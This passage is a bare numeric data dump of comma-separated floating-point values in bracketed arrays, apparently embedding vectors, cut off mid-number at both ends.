0048627793,-0.009249395,-0.04695466,-0.005064401,-0.022139058,-0.014452722,-0.009062871,-0.044601712,-0.033851426,0.0076800627,0.0014512535,0.05467512,-0.049054176,0.015349602,0.022589235,-0.028915182,-0.029829577,-0.036697675,0.041189414,0.004746315,0.047915965,-0.00007181479,0.004945489,-0.084974855,-0.02215522,-0.057907145,0.04150486,-0.02077169,0.00087959284,-0.002014915,-0.0638402,-0.052189834,0.048895985,0.0035741837,-0.052503396,-0.0068818936,-0.023976734,-0.030781616,0.010569556,-0.021324884,-0.0034142812,0.03674832,0.029550448,0.090497695,-0.003790562,-0.0017283858,-0.043232374,0.07551227,-0.005235359,-0.019767372,-0.042804856,0.009500201,-0.05528976],[-0.010029926,0.02686782,-0.15554884,-0.04695398,0.08049894,0.027180819,0.042716358,0.031270046,-0.030791676,-0.04330548,-0.036773,0.05748541,0.10101574,0.020222152,-0.027061565,-0.022772573,-0.02167044,-0.054064948,0.030651642,0.00860511,-0.042959973,0.013022072,0.0015782326,-0.023706522,0.035205994,0.06519267,-0.0076452172,-0.028002487,-0.034675892,0.032792185,0.07224385,-0.034098588,-0.046424963,0.0010910932,-0.08297105,-0.008229177,0.045189828,0.086325265,-0.0038949056,0.00673488,0.038218167,0.01964321,-0.001882075,0.010917402,-0.0019683214,0.013503954,0.034807805,-0.036804717,0.028229484,-0.027738083,0.06644501,-0.02663801,0.010405736,0.017341169,0.09141665,0.023952853,-0.053785723,0.04050099,-0.005779017,-0.05944435,0.035911515,0.07039069,-0.09773345,0.061579052,0.026576985,-0.009760711,-0.06951495,0.049475648,0.003160991,-0.054934863,0.044064626,-0.0363397,0.0023759382,0.051377524,-0.036490813,-0.0033801375,-0.029777715,-0.034195784,0.023165358,0.085801065,0.036357872,0.025784925,0.08541561,0.014910429,0.031034928,0.026697809,-0.025575455,-0.0030821057,-0.03759426,0.07969371,-0.0054759183,-0.02473973,0.028011013,0.054672927,0.0012961384,0.02364118,0.019001732,-0.00007855854,-0.025371604,-0.006216163,-0.016029,-0.016565472,0.011026114,-0.02951796,0.029778112,0.005690389,0.014847974,0.008850174,-0.033321746,-0.032056917,-0.030039871,0.05849637,-0.021088207,-0.019585837,-0.038903233,-0.031631783,0.014735449,-0.034494743,0.006575931,0.049148764,0.027361665,-0.046350855,-0.01835818,0.03439812,-0.034393724,0.029029889,-0.0334007,-0.004103229,-0.013515767,-0.025256775,-0.014200229,-0.02653072,-0.031824827,-0.0041870857,0.035722837,0.12188176,-0.041963715,-0.03150472,-0.009398011,0.03144107,-0.0058846977,0.05252278,-0.00015725325,-0.0117107,-0.0013536481,-0.03205693,-0.0041989214,0.010379962,0.004261022,0.035847526,0.010758854,0.037819326,0.006292607,0.031089857,-0.011510705,0.00979911,0.05251544,-0.0057025044,0.039052453,0.04074432,0.067613,0.008626461,-0.034228913,0.04493707,0.01750078,-0.03478303,-0.04958026,0.022412157,-0.008090502,0.031175304,-0.04220807,-0.017361239,-0.0015560925,0.0067857835,-0.009385946,-0.023052342,0.06683436,-0.016382543,0.018420493,0.008566873,0.01736723,0.016032845,0.065183796,0.0038170484,-0.012035423,-0.032464188,0.011657545,0.017960342,-0.0063112457,-0.016912702,0.049920805,-0.0075920545,-0.060420316,-0.044871006,-0.042155586,-0.05011169,0.028906507,-0.016918965,-0.0010568486,-0.0119549325,0.000004620272,-0.007536618,-0.01930284,-0.023588968,-0.05784597,0.011531246,0.0048924983,0.004335519,-0.05381079,0.054909855,0.066058025,0.0044338973,-0.009381486,0.016134426,-0.0094811795,-0.02497364,-0.039339162,-0.015156761,-0.027474804,0.0024086602,-0.02393254,-0.009740989,0.00066836644,-0.02725117,0.038531665,-0.0021959415,-0.03786619,-0.0062127593,-0.013049866,0.015484922,0.024640277,-0.06754999,0.04097474,-0.024486985,0.036035098,0.010777619,0.046252236,0.046663724,-0.00803501,0.022670528,-0.0010399658,0.06514313,-0.011947691,-0.024551535,-0.01965374,-0.037282288,-0.010810038,-0.04786977,-0.01028408,0.053052597,-0.02528031,0.03995666,0.040230647,0.005822325,0.034455426,-0.010939988,-0.029023523,-0.021119343,0.033343308,0.044546288,0.04178121,-0.017245412,-0.0025811878,-0.038504023,-0.056193095,-0.019163504,-0.03300999,-0.01572561,0.040412642,0.008610423,0.0037202437,0.024929775,0.051091745,0.03799277,-0.0021148808,0.0374212,-0.0011850891,0.00017865954,-0.0057322145,-0.016075283,-0.036819365,-0.015010434,-0.023351708,-0.033904463,-0.011528431,0.025737397,0.0013232478,0.019917006,0.025823748,-0.0092752045,0.009334797,-0.030598924,-0.023655232,0.044747725,0.027613403,0.025952922,0.010959548,0.013217885,0.019173384,-0.028701434,0.019322738,0.0053882035,0.07038668,0.034821596,-0.0047055795,-0.02489829,-0.023133062,-0.032390643,-0.0088404985,-0.024981422,-0.08117393,0.027986962,-0.02694528,-0.0076014083,0.0043571675,-0.009168883,0.004689401,0.038714793,0.058547392,-0.03910612,0.0057655065,-0.055935737,0.01343113,-0.011811255,-0.01402199,0.053756,0.003435121,0.0061869365,-0.04107472,0.03605776,0.04605669,0.06557963,0.03307491,-0.024106598,-0.03350806,0.025368808,0.02743174,-0.0050588264,-0.0007534588,0.012648652,0.05427453,0.009463317,0.051558055,-0.0047854027,0.030243583,0.020614415,-0.06724515,-0.04664778,-0.0013799943,0.041768927,-0.038381986,0.0014845455,-0.014730129,-0.0065041874,0.03681202,0.027432539,0.04151384,0.014250759,0.037180763,-0.013900975,0.05270815,0.020426592,0.028239222,0.0028286462,-0.009895683,-0.0043429793,0.0027674858,0.02858394,-0.009989938,0.024647444,-0.011886243,-0.035405613,-0.032798205,0.03618242,-0.029082378,0.025103627,-0.014344939,0.035324115,-0.027960135,-0.020278674,-0.008910712,-0.048868958,0.005798326,-0.0025187638,0.0328978,0.021154063,-0.0007476608,-0.048713814,0.02297811,0.0005424442,0.0023404805,0.024366714,-0.014069127,0.03225496,0.0018128355,-0.006205224,0.0530261,-0.03089213,-0.012577162,0.034189876,-0.034274075,-0.048566192,0.021658925,0.0082908645,-0.038159616,0.01137345,-0.052261043,-0.022240957,-0.0013180006,-0.029810978,0.0005215394,0.03315213,-0.057362612,-0.07212845,0.036801856,-0.014304721,0.047834255,0.026552398,-0.045724664,-0.021197686,-0.002840613,0.050277345,-0.0549021,-0.009530686,0.030167669,0.01589276,0.039405346,0.06753334,0.019552855,-0.034559023,0.072983764,-0.00078196824,0.01895089,-0.0010571926,0.03466865,0.014850907,-0.019621218,0.0120671205,0.01690706,0.0029562665,0.041173488,-0.063128,-0.029031284,-0.026793534,-0.01207015,0.06444704,0.088696025,-0.01572687,-0.06069259,0.057638567,0.023267465,0.03219531,0.04857203,0.00811422,0.09812254,-0.038932826,0.04171903,0.030243628,0.06518896,0.03807485,0.0064148093,-0.04502564,-0.050344333,0.023769207,-0.00065150927,-0.02618216,0.0009803752,-0.035445414,0.040436525,0.08658512,-0.052468296,0.035169564,0.021172019,-0.031528592,-0.015193693,0.0762758,-0.024240797,-0.031740602,-0.011858013,0.0115887085,0.011789551,-0.059995417,-0.011279672,-0.04908109,-0.010595144,0.06353981,-0.009696855,-0.03632847,0.010320573,-0.011156455,0.04192328,0.0200035,-0.0106068775,-0.02072311,-0.062190253,-0.04207105,-0.014953745,0.010929735,0.07150306,-0.0022676897,-0.02027108,0.0072557125,0.019410957,0.020983625,0.0023589237,-0.033296015,0.07889785,-0.051174298,-0.05248149,0.025395148,0.008535967,-0.0133324,0.013871812,0.03107876,0.06683298,-0.09277655,-0.042361666,0.057098586,-0.059910063,0.020180931,0.02766944,-0.04768181,0.0065272753,-0.013768994,-0.046480056,-0.02073425,0.029202867,-0.106327064,0.020501459,0.016210763,0.05164421,0.03788659,-0.043535363,0.008344583,0.027865654,-0.00658062,-0.016127104,0.051835403,0.033871137,0.044309493,0.009560618,0.02557076,0.0043407916,-0.023859084,0.01546327,-0.0033756536,-0.0141911125,0.039569918,0.0045704627,-0.095847495,-0.00068241864,-0.039692633,0.0119873425,-0.040815398,-0.004444514,-0.02185713,-0.032116298,-0.01958238,0.007436857,-0.0320756,-0.052178975,-0.021126008,0.03889323,0.015489809,0.026965033,-0.028412223,-0.0153443795,-0.013843378,0.007039441,0.00018463597,0.024025219,-0.06729424,0.039065626,0.0055761957,-0.0269931,-0.052554913,0.023525652,0.01867514,-0.03342304,-0.053166594,0.050806873,-0.06287124,0.016088044,0.037947718,-0.016078878,0.010162872,-0.06274044,-0.0127527835,-0.019280953,0.015302092,-0.01265563,-0.04745168,0.03975351,-0.008925011,-0.01561619,0.011767291,-0.019009387,-0.018259002,-0.059653535,-0.101630256,0.03264231,0.03846833,0.071791954,-0.06264274,0.044601373,0.08604016,-0.029041551,0.05502731,0.035274416,0.008491424,-0.04391067,0.024756476,-0.01751851,0.014462529,0.02489402,-0.039830804,0.05195211,-0.025938677,-0.042534303,-0.035737906,-0.04128246,-0.08901722,0.052932836,-0.04810619,0.033126563,0.01967702,-0.019215163,-0.030558415,0.03896912,0.04414621,-0.091118835,0.015810626,-0.03792532,-0.00086932903,-0.072685905,-0.015409763,-0.019104442,0.030974401,-0.024230054,0.05305392,-0.008898302,0.0013563392,-0.03072976,0.009045682,0.013909014,0.035572503,0.029282086,0.05049084,0.0006440918,-0.019638712,0.06187849,0.081524104,0.012532396,-0.047406666,0.00030878256,-0.015887126,0.034912966,0.014650242,-0.009240537,-0.021594979,0.013115443,-0.05970041,-0.06723105,0.013875237,0.038050596,-0.036020327,-0.04047586,-0.016892778,0.019214328,-0.06659693,0.029303364,0.014450362,-0.005913738,-0.029574687,-0.0030856614,0.009421589,0.021054404,0.035301886,0.0014990156,-0.023159599,-0.00008059649,-0.0008150662,0.05522055,-0.043470956,0.021316336,-0.024667338,-0.037542418,-0.007999541,-0.024281394,-0.024294993,-0.008170313,-0.027822511,0.020842018,0.007230623,-0.008285033,0.01154665,-0.027337125,-0.021048268,0.000022745735,-0.0062635094,-0.030773683,0.034073927,-0.026756138,0.0112471385,-0.00038797283,0.03253638,0.023532124,0.009771911,-0.022195557,-0.05318074,-0.05160625,-0.0031534648,-0.033908024,0.023473047,0.03471941,0.006946316,-0.01147019,-0.037306566,-0.03603123,-0.0013118327,-0.0046062362,0.0024382628,-0.034399156,0.0248993,0.024673304,-0.029473137,0.015779555,-0.055899944,0.0073502087,-0.050858747,-0.016988186,-0.003516426,-0.02043942,0.04082355,0.01354021,-0.014052953,0.0064568836,0.0035934162,-0.07682402,-0.01851478,-0.094198465,0.043349862,0.02471427,-0.0018464074,-0.024415204,-0.024039693,-0.05326767,0.048325278,-0.015316947,-0.07589928,0.002197001,-0.048981827,-0.035778463,-0.0050808657,-0.031613387,0.06065972,0.015883088,0.030170718,0.10150867,-0.00053430063,0.024476888,-0.036876522,0.02871911,-0.0401254,-0.015234292,0.00045510245,-0.029236354,0.015620127],[-0.014247941,0.07103538,-0.16686271,-0.051323712,0.094890155,0.0043663257,0.032350935,0.002357501,-0.02352456,-0.030856747,-0.048505716,0.0081482455,0.07245637,0.03285366,0.025007935,-0.051479697,0.025924364,-0.07895987,-0.0056686006,0.042204514,-0.018186942,0.012694916,-0.00072661426,-0.064022,0.075382054,0.03927862,-0.03740898,-0.032376092,-0.051172957,-0.04185351,0.018014433,-0.08098692,-0.001256894,0.013229468,-0.085939795,-0.03968109,0.043077253,0.04174432,0.0056395843,-0.017194616,0.06747056,0.027739465,-0.041257765,-0.001486805,-0.0047039124,0.009976369,0.013208632,-0.035974536,0.05853298,-0.07510844,-0.0032338686,-0.048723325,0.04662384,0.04124227,0.04814102,0.07645099,-0.027751977,0.0103897145,0.0012313366,-0.046309147,0.095205754,0.08288646,-0.09086161,0.02271173,0.022153577,-0.026646987,0.0011873682,0.04823367,-0.02415461,-0.026804388,0.013473321,-0.025480531,0.0038505956,0.05109711,-0.056710824,-0.0006257192,-0.025242465,-0.022387452,-0.014772728,0.05957735,-0.011465157,0.025417103,0.11798773,0.03047986,0.025126344,-0.033268586,-0.044340383,-0.034644615,-0.05428533,0.11007667,0.029804954,-0.019551635,-0.007868292,0.00076985284,-0.04596231,-0.004867619,-0.0002502638,0.023044111,0.015081869,0.0071625933,-0.040513963,-0.015225226,0.011738824,-0.021246325,0.019374778,0.07570621,0.004380527,-0.004004459,-0.048589386,-0.019480022,-0.016097771,0.037156332,-0.038583893,0.0152113475,-0.05666869,-0.018811066,0.017236698,-0.009197003,-0.047741853,0.049356215,-0.014849265,-0.030002367,0.009467081,0.06768723,0.006512165,0.03646061,-0.027229955,-0.01337502,-0.019374888,-0.038910266,0.022362819,0.01972796,-0.04941202,-0.0015975933,0.0016227543,0.063308574,-0.03779816,0.01205112,0.01244078,-0.0022817734,0.02601541,0.039256662,-0.034793988,-0.053406198,-0.0012549332,-0.06666244,0.0059876526,0.008618815,-0.048004195,-0.013759694,0.01816981,0.024340255,-0.0059621204,0.022697516,0.017855061,0.0058679064,0.03141198,-0.024957033,0.020457752,0.0149500985,0.040554445,0.025851507,-0.082848154,0.029678684,0.027072404,-0.04369388,-0.0034780724,0.027458906,0.0057402956,0.033158485,-0.038414642,-0.021891948,0.008767771,-0.013361368,0.012275973,-0.030320588,0.04759715,-0.042217754,0.020967962,-0.032872465,0.005922112,-0.06971473,0.031139506,0.026522594,-0.04196601,-0.011211513,-0.011458745,-0.042051807,-0.0077046202,-0.01780083,0.013572081,0.014901566,-0.061086863,0.019424675,-0.03443359,-0.058857277,0.014639709,0.026527312,-0.0031236752,-0.009995942,-0.046319053,-0.006433436,-0.054954335,-0.017422205,-0.038111206,0.07417435,-0.027065774,0.021900512,-0.009352567,0.026116936,0.081007026,-0.012337354,0.012039819,0.03381266,-0.0051479465,-0.024082007,-0.014010303,-0.016846541,-0.038060732,-0.018116305,0.009570321,-0.02635063,0.0013967208,0.00030909356,-0.016314765,0.008270522,-0.06546226,0.0040000365,-0.012893538,-0.002493216,-0.0047603706,-0.07565834,0.022315439,-0.01929295,0.0060049333,0.02473911,0.007639377,0.06923834,0.041717697,0.026907325,0.008732329,0.030652558,-0.019477306,-0.006194612,-0.04105302,-0.007096072,-0.0006751216,0.001909225,-0.031926777,0.065384045,0.022319948,-0.0043173893,0.017652437,0.026567103,-0.0018223856,0.0021704054,-0.005007757,-0.011832513,0.066826545,0.05205515,0.04838415,-0.059173036,0.014776875,-0.023400843,-0.04243623,0.0047240527,-0.064371526,0.01037001,0.037534837,-0.00011464176,0.038588088,0.019731393,0.018331341,0.03304255,-0.023666464,0.0076830527,-0.010352688,-0.0033969795,-0.018317541,0.017655097,-0.012827629,-0.04056129,0.0065294458,0.009931261,-0.008375062,0.03611936,0.0022152,-0.0004629948,0.020181322,-0.006710577,0.005645855,-0.025689725,-0.009599129,0.012539324,-0.020854363,0.04308024,0.02769154,0.0004716918,-0.023761526,-0.074998505,0.035663832,0.058843557,0.048807748,0.06283015,0.008129278,-0.0043620532,0.0037310475,0.011407222,0.0081911795,-0.05927414,-0.02643734,0.0013801004,-0.039281525,-0.03704825,-0.03921008,0.040406138,0.01815871,0.06471724,0.041585658,0.027402453,-0.0015336414,-0.064428136,0.04072915,-0.066121064,-0.017043017,0.09168376,-0.0029904628,-0.010012674,-0.015203705,-0.033282034,0.042495158,0.031020608,0.052561082,-0.02399443,-0.04565178,0.030905547,0.020153284,-0.013837042,0.01094162,0.022231944,0.04764022,0.015109614,0.042492487,-0.02455214,0.037741784,-0.017123612,-0.021822957,-0.0021965378,0.043815028,0.031508777,0.009301149,-0.0018497105,-0.022308612,-0.017412525,0.03229031,0.042350367,0.040116258,0.029658163,0.007868489,-0.032148723,0.049958114,0.025746655,0.0053948346,-0.0006895943,0.0015367371,0.05015309,0.041894402,0.018801987,-0.001511633,0.033618554,-0.03393092,-0.021262387,-0.028681155,0.010267186,0.0024878564,-0.028341377,-0.082381286,-0.0025591278,-0.017149279,0.013251395,0.012065937,-0.021903101,-0.024706759,-0.007905307,0.04394691,-0.006844094,0.005238932,-0.010817215,0.04841122,0.02579278,0.0045957044,-0.02176395,-0.03925842,0.012622908,0.018319687,-0.02826132,0.034803633,0.03280097,0.0022814956,0.051702082,-0.045141704,-0.03331591,0.033150572,0.008468644,-0.005126427,0.03727029,-0.027691072,-0.038439825,0.06055457,0.00063360995,0.03642343,0.012927948,-0.03512833,-0.000073332005,0.014203923,0.017455496,0.0041712206,-0.017891737,-0.06151918,-0.01944,0.038144555,0.034503017,0.04582278,0.018419098,0.040092073,0.056722894,0.0501897,0.051897194,-0.0014180851,-0.06460286,0.0504801,0.01418187,0.070324436,-0.0017914148,-0.020781659,-0.001355061,0.0035602911,0.06593247,0.002155657,0.04558529,-0.0011026837,-0.044573877,-0.08069617,-0.061269745,0.0049894424,0.058433186,0.014571209,-0.029572906,-0.081408076,0.038525563,0.00996041,0.038216643,0.011505676,0.05048777,0.08252693,-0.022352455,0.0069421134,-0.040097266,0.020158641,0.00047933837,-0.005356629,0.0053653675,-0.06488716,0.03850175,0.031525224,-0.021777323,-0.00066097686,-0.018845262,0.018191498,0.06516179,-0.04377423,0.0037877248,0.023529727,-0.021737413,-0.031261347,0.0014390501,-0.021840159,0.01661861,0.030252323,0.046254933,0.00484724,-0.041272316,-0.03514716,-0.03224344,-0.027735256,0.07784902,-0.007039668,-0.03209887,0.016805112,-0.02421411,0.038407482,-0.013565276,0.010065943,-0.0057280734,-0.097837165,-0.024026806,-0.014461602,0.01710647,0.072508134,0.04566823,0.014958627,0.040869698,-0.0049310825,-0.017689113,0.01571175,-0.009974871,0.047112193,-0.061220177,-0.07281402,-0.010478844,-0.0018961168,-0.021602327,0.008829563,0.019065468,0.040116385,-0.03995828,0.021578042,-0.009237382,-0.07604808,0.002980963,0.02104486,-0.036697913,-0.013846543,-0.019472519,-0.079050116,-0.023985086,-0.003819078,-0.07371649,0.03644941,0.049877208,0.049648196,0.046313055,-0.03980182,0.0014163451,0.0259165,0.00088612136,-0.0065303403,-0.026904842,0.017824365,0.023041902,0.007014296,0.06747407,0.020161685,0.02460688,0.056565356,-0.011404516,0.017219158,0.035632644,0.0547228,-0.117800266,0.00611065,-0.04738665,-0.0025797458,0.0053704213,0.021116925,-0.014987082,-0.034303762,-0.024042588,-0.018862588,-0.04542494,-0.023344593,0.023608075,0.025906188,0.004215834,-0.004931297,-0.04205158,-0.030292949,0.007813583,0.0122822225,0.050253995,0.0083491495,-0.06689429,-0.009557957,-0.010292513,0.0038044106,0.004585644,0.0030659747,0.022039946,-0.034369938,-0.08719271,0.024492005,-0.021328298,0.011038727,0.0109670255,-0.02548526,-0.022337064,-0.07385033,0.010689321,-0.0432878,-0.033954997,-0.034209196,0.015253374,0.050610982,-0.0025234034,0.020433813,0.01856126,-0.0014464972,-0.012562027,-0.04407728,-0.07984903,0.005007206,0.0254849,0.06651942,-0.032932326,0.017179396,0.081806324,-0.03837552,0.02654491,-0.0028545305,0.0059013935,0.025569443,0.010686273,-0.034089025,0.0022878395,-0.008425368,-0.037321802,0.038527977,-0.018776333,0.00046494283,-0.019344475,-0.014306204,-0.08125869,0.032130558,-0.054195397,0.00558853,-0.0066570775,-0.034209974,0.022852259,-0.0032749728,0.009101461,-0.05299851,0.038973223,-0.020336643,-0.023557646,-0.05068959,-0.0025240793,-0.0046831914,-0.024175191,0.014344973,0.041867953,0.019430872,0.0003665839,0.010480585,0.011542198,0.085366555,-0.04417452,0.020653967,0.03196603,0.03772925,-0.017513365,0.083746,0.07721865,-0.01179508,0.008285011,-0.004240536,-0.052111827,0.05271628,-0.036050625,-0.056659315,0.00986364,-0.004369106,-0.019634878,-0.002423809,-0.00070097856,0.009399244,-0.0008144315,0.008565405,-0.016077159,-0.048228547,0.00082947867,0.03938412,0.03843545,0.006894612,-0.015097574,-0.0056847697,-0.0062330705,0.026887905,0.011819477,-0.028831905,-0.04435191,-0.011087283,0.0101135755,0.019622477,-0.040949978,0.03963749,-0.031334106,0.034936342,-0.037390314,-0.009794386,-0.009215116,-0.017477712,-0.017039916,0.011353434,0.011112155,0.022767277,0.020620367,-0.016165217,-0.020736393,-0.01880162,0.05911088,-0.0044706557,0.028659763,-0.014409149,0.02773469,0.011415788,0.0045213164,0.025854142,0.0256961,-0.029145718,-0.07121506,-0.024314411,0.01029351,-0.015175486,0.052508302,0.05249107,0.041089594,-0.039661266,-0.061392594,-0.026211254,0.026997924,0.052140813,-0.0135408025,-0.055832878,-0.00039428394,0.014805172,-0.007647596,0.009147824,-0.043754864,-0.0053800303,0.010008635,-0.005043233,-0.027423875,-0.033514228,0.05907475,-0.017186197,0.007582343,0.021592721,-0.037289146,-0.04561048,-0.030214034,-0.041476484,0.011999274,0.0017745977,0.03515734,-0.020152789,-0.036928877,-0.01067111,0.057435885,0.016937563,-0.036799718,0.013234544,0.013903701,-0.01290198,0.006682366,-0.0136466995,0.015596179,0.025871824,0.03374765,0.117029905,0.026287148,-0.0003483697,-0.026321096,0.07317205,-0.03346932,-0.068844855,-0.014998787,-0.032215443,-0.053248547],[0.041627172,0.06554341,-0.15913709,-0.0749114,0.06332359,-0.040528864,0.02539289,0.061273962,0.003586259,-0.06258636,0.0403307,-0.051757783,0.094572194,0.027755804,0.0100953225,-0.057519373,-0.015508083,-0.070402876,-0.029937156,0.025347188,-0.077856466,0.000046542766,-0.0016575048,-0.01702389,0.020011682,0.05469563,-0.057271667,-0.031460144,-0.03525975,-0.01570572,0.058350217,-0.027370537,0.0011915284,0.0006484794,-0.061335128,-0.017972674,0.024476243,0.033804163,-0.040523175,0.029071804,0.044510312,0.016291298,-0.008860153,-0.029357778,0.00008133201,0.016228896,0.021796273,0.006954777,0.03051099,-0.034567077,0.027224826,-0.0011979621,0.04183514,0.030255342,0.11499984,0.058783058,-0.021929195,0.03214035,0.02670968,-0.08807517,0.08206741,0.07606882,-0.08100114,-0.0019169749,0.037308216,-0.038789965,-0.032753676,0.05113523,0.0010748367,-0.08125667,0.016654456,0.00017283454,0.033382125,0.0055092517,-0.056348767,-0.012005861,-0.028408231,-0.020317828,-0.008431251,0.034184143,0.024889272,0.021684712,0.09448944,0.008196639,0.038242128,-0.020493926,-0.023701083,-0.009041423,-0.010283722,0.07075751,0.005190747,-0.00830149,0.024825329,0.008142113,-0.03266348,0.027176838,-0.014849046,-0.01813648,-0.024248462,-0.015474443,-0.09479214,-0.0037861825,0.048075315,0.019974027,0.039986286,0.031659983,0.018852664,0.0020465415,0.0023942215,-0.005085161,-0.042944845,0.07789343,-0.050769407,0.010207619,-0.050809342,0.005216659,0.07400313,-0.020872992,0.004168567,0.054335956,-0.013430636,-0.014369598,0.022635601,0.030714346,-0.009643072,0.030281937,-0.036734354,-0.013793949,-0.03792322,-0.02991218,-0.015413709,-0.038693894,-0.06902055,-0.0031418842,0.05338454,0.09681059,-0.049467888,-0.016369121,-0.004180734,0.027939368,0.0017339005,0.032792866,-0.037709355,0.008214827,0.005644775,-0.005903963,0.037861194,-0.0031213001,-0.0034391715,0.035394568,0.021601787,0.060142864,-0.02894874,0.017618181,-0.0038874082,-0.012105271,0.04500484,-0.05633866,0.00023925035,0.046983615,0.039735395,0.00995104,-0.07257283,0.04268448,0.0035459914,-0.021836478,0.0009954748,-0.024215689,-0.010057488,0.015138575,-0.06751835,-0.019870115,0.02772346,0.0057402863,0.043754987,-0.044943616,0.08728137,-0.0590416,0.019724354,0.008417264,0.03702755,-0.05690453,0.0015003867,0.0291882,0.009872206,-0.0012794931,0.015767995,0.025619287,0.014556155,-0.025663488,-0.0038450807,0.009293181,-0.07559377,0.0032625482,-0.057565633,-0.030833766,0.041925065,-0.030993326,0.017585184,-0.019095225,-0.010009808,-0.006608014,-0.0646823,0.007778488,-0.03523875,0.07359385,-0.011194478,0.010125147,-0.07189369,0.017474197,0.047576092,0.008798226,0.026634164,0.034634534,0.008002812,-0.05269892,-0.01584163,0.01599367,-0.049445525,0.05584491,0.0065954044,-0.0048067844,0.0028991608,-0.014430851,-0.0022932326,-0.00698155,-0.04573659,0.009227243,-0.035366446,0.0045751845,-0.0198834,-0.07803958,0.028722582,-0.01691001,0.047779992,-0.009900315,0.043516878,0.028156584,-0.0017445966,0.0483518,0.0035219907,0.03206423,0.0028121157,-0.044626143,-0.04711638,-0.010010066,0.019665372,-0.036678992,-0.0028523349,0.049103394,0.013349694,0.025056418,0.061781608,0.0017893256,0.014490638,0.004820785,-0.00972593,0.018502133,0.027268134,0.0125736585,0.052593604,-0.066726066,0.0067166174,-0.052494865,-0.05845669,-0.0072121453,-0.034133896,-0.053963695,-0.0048255445,-0.027724825,0.033153385,0.026204066,0.014227427,0.015282323,-0.003612761,0.028542617,-0.013480594,-0.003674554,-0.03689324,-0.016695473,-0.016802633,-0.025174698,0.0006396492,0.010144237,-0.0025009813,0.026432917,-0.0022549925,0.00021373814,0.022919908,0.00733461,0.012924612,-0.006012002,-0.030649269,0.04520359,-0.015419857,0.02241505,0.0650231,-0.008481227,-0.0121835545,-0.09184937,0.049249962,0.07559274,0.061376985,0.063195236,-0.03113927,-0.024796257,-0.025950218,-0.0064010085,-0.015821926,-0.008638381,-0.030735578,-0.04172097,-0.020858223,0.009518602,-0.026852613,0.035792813,0.03372833,0.031989854,0.03431452,0.013058318,0.022951286,-0.017140673,0.012858608,-0.05758006,-0.024529662,0.037701506,-0.0033803894,-0.019945022,-0.057054393,-0.028600717,0.055973988,0.0090291975,0.031195082,-0.044732988,-0.033587016,0.016086187,-0.011193067,-0.007943,0.022014594,-0.012528061,0.044889264,-0.018737234,0.020338234,-0.045271248,0.029239764,0.004603003,-0.04921041,-0.022324923,0.0593811,-0.014381417,-0.005655494,0.033882417,-0.030527212,-0.025233587,-0.0074474826,-0.0016582462,0.05920083,0.030473903,0.013330411,-0.056521125,0.071392715,0.036987368,0.0122347325,0.001703039,-0.0032566644,0.013442356,0.028614115,0.008196415,0.026659466,0.029978558,-0.017132204,-0.0317589,-0.013365224,0.017205425,-0.017945657,-0.023032753,-0.049326755,0.016693663,-0.031332787,-0.0003411091,0.052676376,0.0038549677,-0.03391936,0.01498306,0.033570305,0.016449727,-0.022876011,-0.016539227,-0.016285975,0.044333186,-0.01701621,-0.020648036,-0.02001996,0.0005420843,0.008453361,-0.029464748,0.002402882,0.021270296,-0.006249394,0.048939727,-0.039148316,-0.06348669,0.03603151,0.010190086,-0.037901245,0.041418217,-0.03367667,-0.02854123,0.0043581496,0.024894137,0.052797277,0.04437333,-0.035711534,-0.013631789,0.03403279,-0.002030935,0.026916796,-0.023085952,-0.0035278671,-0.026472328,0.040170852,0.0045344313,0.009846642,0.050475128,0.026061611,0.052939642,0.022025036,0.05162274,-0.0034071433,-0.027953608,0.061468482,0.023039078,0.032559194,-0.0039425213,-0.044566546,0.048599105,0.015060282,0.11310857,-0.017006125,-0.007783359,0.034364793,-0.05947371,0.011879559,-0.044710368,0.014840977,0.041016813,0.041343924,-0.022708591,-0.064885825,-0.00015633517,-0.023551045,0.03762317,0.055992603,0.010042409,0.08239929,-0.032061253,-0.007704891,0.01231921,0.013496321,0.016213614,0.0014872776,0.02011274,-0.03248172,0.032865252,0.046333566,-0.044886682,-0.017444976,-0.044133145,0.02455546,0.07371561,-0.041460775,0.025057333,0.0042866203,-0.05911606,0.011781207,0.031532157,-0.027844157,0.01631181,-0.026480813,0.042288493,0.026890082,-0.0121597145,-0.052485928,-0.0649071,0.002368397,0.038325194,0.021705322,-0.023606507,-0.005130497,-0.007819921,0.029912038,0.008853413,-0.0016128522,0.013437682,-0.084863134,-0.014728418,0.012824006,-0.0117949275,0.042433865,0.04665867,0.005973718,0.064245604,-0.004249185,-0.0024996994,0.018812861,-0.012644536,0.055773478,-0.047215797,-0.05858859,-0.005932705,0.0063818274,0.0051353355,-0.037221096,0.054822817,0.053564798,-0.033911914,0.024544526,0.025353944,-0.050996765,0.005061661,0.023222545,-0.07406677,-0.018493319,-0.0248329,-0.04467529,0.018372402,-0.0053624283,-0.065109305,0.025767313,0.003328128,0.012458024,0.036735635,0.0033758017,0.043749955,0.018935326,0.010252531,-0.03423284,0.016644912,0.0104883,0.010895673,-0.025867421,0.039113317,0.025330745,0.028989939,0.06275382,-0.014048163,0.010077703,-0.011666218,0.022149084,-0.08492976,0.042478625,-0.021208312,-0.005509035,-0.026023375,0.024357874,-0.0586555,0.0010633436,-0.068247944,-0.014129968,-0.025338208,-0.050781548,0.029166317,0.055330556,0.028293218,-0.01553828,-0.0030260095,0.0041005923,-0.018877303,0.013473155,0.03109255,0.005583758,-0.06503025,-0.0009390184,-0.023979677,0.0018130722,-0.005663626,0.0655633,0.011242838,-0.033169694,-0.05980011,0.03144981,-0.036094435,0.018352173,0.021764757,0.018434236,-0.01743448,-0.10344736,0.02080294,-0.008223643,-0.0024562972,-0.0116975065,-0.025877357,0.012168051,-0.032998428,-0.0122940475,0.020939756,0.047301594,0.02367436,-0.06920314,-0.08606124,-0.017840754,0.028323585,0.044292197,-0.09437783,0.06935413,0.0375593,-0.0068333843,0.004016869,0.006768405,-0.00805788,0.0075967303,-0.027564604,-0.013483558,-0.049217183,-0.000590773,-0.03551084,0.044487283,-0.007028106,0.025553854,-0.03877902,-0.010918057,-0.07109875,0.054941032,-0.029364403,0.0171778,0.0012075444,-0.043421295,-0.016816426,-0.0039199796,0.017414786,-0.05975652,0.032783173,-0.072193645,-0.00005676211,-0.047917686,0.0012270657,-0.027253035,-0.014111435,-0.0125311855,0.022217657,0.014422758,-0.04598393,0.028140053,0.03560173,0.041117933,-0.039427277,0.019823708,0.094992265,0.031328153,-0.0041498,0.08833166,0.07260769,-0.004404394,-0.029321173,-0.024357393,-0.0230618,0.05035404,-0.008815399,-0.016927658,-0.021698358,0.050308604,-0.0074503324,0.0007540986,-0.013752527,-0.017398663,-0.005203878,-0.023371514,0.02614893,-0.02761174,0.008224705,0.056360763,-0.0149